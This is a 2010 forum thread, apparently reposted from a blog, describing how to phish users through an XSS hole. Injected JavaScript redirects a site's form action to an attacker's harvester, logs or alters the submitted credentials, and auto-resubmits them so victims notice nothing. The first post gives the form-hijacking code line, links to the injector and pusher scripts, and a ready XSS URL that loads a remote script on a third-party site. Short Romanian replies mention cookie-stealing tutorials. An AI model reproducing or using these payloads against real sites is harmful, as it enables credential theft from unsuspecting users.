Nytro Posted December 31, 2010 Report Posted December 31, 2010 How to phish the effective and smart way using XSSNormally if you wish to phish a user for information like passwords, emails, social security numbers, credit card numbers or what not and you’re exploiting some website with a bug in its handling of user content (either from a database or from the GET data) (Please note that POST XSS exploits isn’t really easy to exploit since you’ll have to make the user POST the data him/herself) you normally would like to send the user to your own phishing page where you have copied the compromised sites design, CSS etc. Please note that when phishing by exploiting an unprotected frame which gets its content URL from a GET querystring (RFI) you’ll have to either copy the CSS etc to your own site or simply link to the sites own CSS files.Moving on to the topic of this post, exploiting XSS vulnerabilities to phish the attacked users, of course without the users having a clue.One of the methods which I don’t see get exploited is the JavaScript call “document.formName.action=’http://your-harvester-site.com/exploitingAction.php’”.With the code above it’s possible to create a man-in-the-middle kind of attack where you can either just choose to log the information of the form or you can choose to tamper with the information before posting the data to the original action.It can be done with this 3 step attack:1. step: Inject the forms of a XSS exploitable page, e.g. with a script like this: http://www.e-x-e.dk/labs/autoPhisher/injector.js. A super simple yet effective script I’ll be using for this PoC.2. step: Receive the form data, log it/tamper it and send the victim back to the original site with a new exploited URL injected with a “pusher”. This script could be done like this:http://www.e-x-e.dk/labs/autoPhisher/source/index.phpThis script is using a subclass of the abstract class TopLoader I’m using, it just has some basic functions for getting, setting, saving, deleting etc.The last part of the script is computing a new pusher-injected URL to which the victim will be sent.3. step: Let the pusher to its jobSince we cannot do a POST call for the victim to the original action serverside through PHP, we’ll have to make the browser do it for us through JavaScript.The pusher script generates some JavaScript which is started when the is window.onload(). It tries to set the value of the form elements from the original form submit by the victim with getElementById. If the element is not found by this method it’ll try to set the value via the getElementsByName. Last but not least it auto submits the correct form with document.forms[{form ID}].submit(). The generator script is here:http://www.e-x-e.dk/labs/autoPhisher/source/pusher.phpHere a place you can test this thing out:http://www.doid.dk/page/main.asp?error=timeout&referer=%22%3E%3Cscript%20src=http://www.e-x-e.dk/labs/autoPhisher/injector.js%3E%3C/script%3EExample user / password: testerLars / testerLarsLet me know what you think by making some comments and maybe leaving some more usage examples.Sursa: How to phish the effective and smart way using XSS | Thomas Stig Jacobsen's constant whySfinte Cacat, ce fac de Revelion Quote
luke999 Posted December 31, 2010 Report Posted December 31, 2010 xss nu inteleg cum dracu...nici nu prea stiu cum se exploateaza xss...pana anu viitor sper sa invatz:)) POSTAT IN ANUL 2010 Quote
crs12decoder Posted January 1, 2011 Report Posted January 1, 2011 xss nu inteleg cum dracu...nici nu prea stiu cum se exploateaza xss...pana anu viitor sper sa invatz:)) POSTAT IN ANUL 2010 Am facut acum 2 ani un tutorial despre cum sa trimiti cookie-urile si sa le captezi.http://rstcenter.com/forum/13602-cum-sa-exploatezi-un-xss-dupa-ce-l-ai-gasit.rstExploatarea xss tine mai mult de creativitatea ta, asa cum a aratat nytro mai sus. Invata javascript. Quote